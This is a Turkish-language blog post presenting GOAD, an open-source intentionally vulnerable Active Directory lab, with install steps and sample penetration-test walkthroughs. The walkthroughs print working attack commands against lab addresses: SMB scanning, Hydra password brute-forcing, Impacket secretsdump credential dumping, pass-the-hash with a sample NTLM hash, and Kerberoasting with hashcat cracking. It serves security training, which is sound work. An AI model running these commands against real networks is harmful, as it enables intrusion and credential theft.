Game of Active Directory

Game of Active Directory

Active Directory Güvenliği ve GOAD: Siber Güvenlikte Pratik Bir Laboratuvar

Active Directory (AD), kurumsal ağların bel kemiğidir. Kimlik doğrulama, yetkilendirme ve kaynak yönetimi gibi kritik işlevleri üstlenen AD, siber saldırganların da başlıca hedefi haline gelmiştir. Peki, güvenlik uzmanları bu karmaşık sistemlere yönelik saldırıları nasıl öğrenebilir ve savunma stratejilerini nasıl geliştirebilir? İşte tam da bu noktada GOAD (Game of Active Directory), Orange Cyberdefense tarafından geliştirilen açık kaynaklı bir laboratuvar projesi, devreye giriyor.


GOAD Nedir?

GOAD, siber güvenlik uzmanlarına ve sızma testi meraklılarına gerçekçi bir Active Directory ortamı sunan, kullanıma hazır bir sanal laboratuvardır. Bu projenin temel amacı, kullanıcıların yaygın AD saldırı tekniklerini risksiz bir ortamda deneyimleyerek becerilerini geliştirmesini sağlamaktır.

GOAD’ın Temel Özellikleri

  • Kullanıma Hazır Sanal Ortam: VMware, VirtualBox ve Vagrant desteğiyle çalışan GOAD, önceden yapılandırılmış sanal makineler (DC’ler, iş istasyonları) içerir.
  • Gerçekçi Senaryolar: Ortamda kasıtlı olarak bırakılan zafiyetler, aşağıdaki gibi saldırıların simüle edilmesine olanak tanır:
    • Kimlik Avı (Phishing) ve kimlik bilgisi hırsızlığı,
    • Yatay/Dikey Hareket teknikleri,
    • Golden Ticket ve Silver Ticket saldırıları,
    • ACL (Erişim Kontrol Listesi) istismarları.
  • Ücretsiz ve Erişilebilir: Açık kaynaklı olması, herkesin katkıda bulunmasına ve öğrenmesine olanak tanır.

GOAD ile Neler Öğrenebilirsiniz?

  • Active Directory Temelleri: Domain Controller, Grup Politikaları (GPO), OU yapıları gibi AD bileşenlerini keşfedin.
  • Saldırı Yüzeyi Analizi: Zayıf şifre politikaları, fazla yetkilendirilmiş kullanıcı hesapları gibi riskleri tanımlayın.
  • Sızma Testi Araçları: Mimikatz, BloodHound, Impacket gibi araçları laboratuvarda güvenle kullanın.
  • Savunma Stratejileri: Saldırıları tespit etme ve engelleme yöntemlerini test edin.

GOAD Kurulumu: 3 Adımda Laboratuvarınızı Ayağa Kaldırın

1. Ön Koşullar

  • VMware, VirtualBox ve Vagrant kurulu olmalı.
  • 8 GB+ RAM ve yeterli depolama alanına sahip bir makine.

2. Kodları İndirin

bash
git clone https://github.com/Orange-Cyberdefense/GOAD.git
cd GOAD

3. Sanal Makineleri Başlatın

bash
vagrant up

Ansible playbook’ları otomatik olarak domain controller’ları, Windows/Linux makinelerini yapılandıracaktır.


GOAD ile Örnek Sızma Testi Senaryoları

1. İlk Erişim: Zayıf Şifreli Kullanıcı Hesabının Ele Geçirilmesi

Amaç: Bir kullanıcı hesabının zayıf şifresini kırarak başlangıç erişimi sağlamak.

Araçlar: nmaphydracrackmapexec

Adımlar:

  1. Ağdaki SMB portlarını (445) tarayın:
    bash
    nmap -p 445 192.168.56.0/24
  2. Hydra ile brute-force saldırısı yapın (örnek kullanıcı: user1):
    bash
    hydra -l user1 -P /usr/share/wordlists/rockyou.txt smb://192.168.56.10
  3. Başarılı kimlik bilgileriyle oturum açın:
    bash
    crackmapexec smb 192.168.56.10 -u user1 -p 'Password123!'

2. Lateral Movement: Pass-the-Hash ile Yatay Hareket

Amaç: Ele geçirilen NTLM hash’i kullanarak başka bir makineye sıçramak.

Araçlar: pth-winexesecretsdump.py (Impacket)

Adımlar:

  1. Hash’i çıkarın (örnek hedef: WS01):
    bash
    secretsdump.py 'user1:Password123!@192.168.56.10'
  2. Elde edilen Administrator hash’i ile hedef makinede komut çalıştırın:
    bash
    pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:CCF3C6466D32D3B2A0413333F5C65809 //192.168.56.20 cmd

3. Privilege Escalation: Kerberoasting ile Yetki Yükseltme

Amaç: Service Principal Name (SPN) kayıtlı bir hesabın TGS biletini çalıp şifresini kırmak.

Araçlar: GetUserSPNs.py (Impacket), hashcat

Adımlar:

  1. SPN kayıtlı hesapları listeleyin:
    bash
    GetUserSPNs.py -dc-ip 192.168.56.10 LAB.LOCAL/user1:Password123! -request
  2. Çalınan hash’i hashcat ile kırın:
    bash
    hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt

Neden GOAD Tercih Edilmeli?

  • Zaman Tasarrufu: Laboratuvar kurulumu saatler süren bir işlemken, GOAD ile bu süre 10-15 dakikaya iner.
  • Gerçekçi Senaryolar: Gerçek dünyadaki saldırı tekniklerini birebir simüle eder.
  • Ücretsiz ve Erişilebilir: Açık kaynaklı olması, herkesin katkıda bulunmasına ve öğrenmesine olanak tanır.

GOAD, siber güvenlik uzmanları için bir “oyun alanı” sunarak teorik bilgiyi pratiğe dökme fırsatı veriyor. Saldırı tekniklerini öğrenmek, savunma stratejilerini test etmek veya sertifikasyon sınavlarına hazırlanmak isteyenler için vazgeçilmez bir kaynak. Projeyi incelemek, katkıda bulunmak veya deneyimlerinizi paylaşmak için GOAD GitHub Repo’yu ziyaret edebilirsiniz.

Unutmayın: “En iyi savunma, iyi bir saldırıyı anlamaktır!”


#Siber Güvenlik #ActiveDirectory #SızmaTesti #GOAD #OrangeCyberdefense